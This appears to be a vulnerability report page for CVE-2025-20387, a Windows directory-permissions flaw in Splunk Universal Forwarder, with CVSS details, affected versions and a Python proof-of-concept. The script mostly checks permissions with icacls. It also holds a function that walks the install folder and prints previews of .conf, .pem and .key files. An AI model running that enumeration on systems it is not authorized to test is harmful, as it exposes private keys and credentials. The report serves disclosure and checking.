Security Vulnerability Report
CVE-2025-20387 CVSS 8.0 HIGH

CVE-2025-20387

Published: 2025-12-03 17:15:51
Last Modified: 2025-12-05 17:35:10

Description

In Splunk Universal Forwarder for Windows versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, a new installation of or an upgrade to an affected version can result in incorrect permissions assignment in the Universal Forwarder for Windows Installation directory. This lets non-administrator users on the machine access the directory and all its contents.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Source: Splunk (listed as the secondary CVSS v3.1 metric in the NVD record); the NVD primary metric is 6.5 MEDIUM with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Weakness: CWE-732 (Incorrect Permission Assignment for Critical Resource)

Configurations (Affected Products)

cpe:2.3:a:splunk:splunk:*:*:*:*:enterprise:*:*:* - VULNERABLE (four version ranges, per the NVD configuration data)
Splunk Universal Forwarder for Windows >= 9.2.0, < 9.2.10
Splunk Universal Forwarder for Windows >= 9.3.0, < 9.3.8
Splunk Universal Forwarder for Windows >= 9.4.0, < 9.4.6
Splunk Universal Forwarder for Windows >= 10.0.0, < 10.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-20387 PoC - Check Splunk Universal Forwarder Directory Permissions
# This PoC demonstrates the incorrect permissions assignment vulnerability
# Usage: Run with low-privilege user account on Windows with Splunk UF installed
import os
import re
import subprocess


def check_splunk_permissions():
    """Check if Splunk Universal Forwarder directory has incorrect permissions"""
    # Common Splunk UF installation paths
    potential_paths = [
        r"C:\Program Files\SplunkUniversalForwarder",
        r"C:\Program Files (x86)\SplunkUniversalForwarder",
        r"C:\SplunkUniversalForwarder",
    ]
    # icacls prints inheritance flags such as (I)(OI)(CI) before the rights
    # flag, e.g. "BUILTIN\Users:(I)(OI)(CI)(F)", so tolerate any flag prefix
    # before a Full Control (F) grant instead of matching the literal "Users:(F)".
    users_full_control = re.compile(r"\\Users:(?:\([A-Z]+\))*\(F\)")
    vulnerable = False
    for path in potential_paths:
        if not os.path.exists(path):
            continue
        print(f"[+] Found Splunk UF installation at: {path}")
        # Use icacls to check permissions
        try:
            result = subprocess.run(["icacls", path], capture_output=True, text=True)
            print(f"\n[+] Current permissions for {path}:")
            print(result.stdout)
            # Check for overly permissive settings
            if users_full_control.search(result.stdout):
                print("[!] VULNERABLE: Users group has Full Control (F) permissions!")
                print("[!] Non-admin users can read/write all files in the directory")
                vulnerable = True
            elif "Everyone:" in result.stdout:
                print("[!] VULNERABLE: Everyone group has access permissions!")
                vulnerable = True
            else:
                print("[+] Permissions appear to be properly configured")
        except Exception as e:
            print(f"[-] Error checking permissions: {e}")
    return vulnerable


def enumerate_sensitive_files(path):
    """Enumerate potentially sensitive files accessible due to incorrect permissions"""
    # Match on the file extension rather than a substring of the name
    sensitive_extensions = (".conf", ".pem", ".key", ".txt", ".log")
    print(f"\n[+] Enumerating sensitive files in {path}...")
    for root, _dirs, files in os.walk(path):
        for file in files:
            if not file.lower().endswith(sensitive_extensions):
                continue
            filepath = os.path.join(root, file)
            try:
                # Attempt to read the file
                with open(filepath, "r", encoding="utf-8", errors="ignore") as f:
                    content = f.read(500)  # Read first 500 chars
                print(f"\n[+] Accessible file: {filepath}")
                print(f"Content preview: {content[:200]}...")
            except PermissionError:
                print(f"[-] Cannot read (permission denied): {filepath}")
            except OSError:
                pass


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-20387 Splunk UF Permissions Check")
    print("=" * 60)
    if check_splunk_permissions():
        print("\n[!] System is VULNERABLE to CVE-2025-20387")
        print("[!] Recommendation: Upgrade Splunk UF to patched version")
    else:
        print("\n[+] System does not appear to be vulnerable")
```

References

https://advisory.splunk.com/advisories/SVD-2025-1206 (Vendor Advisory)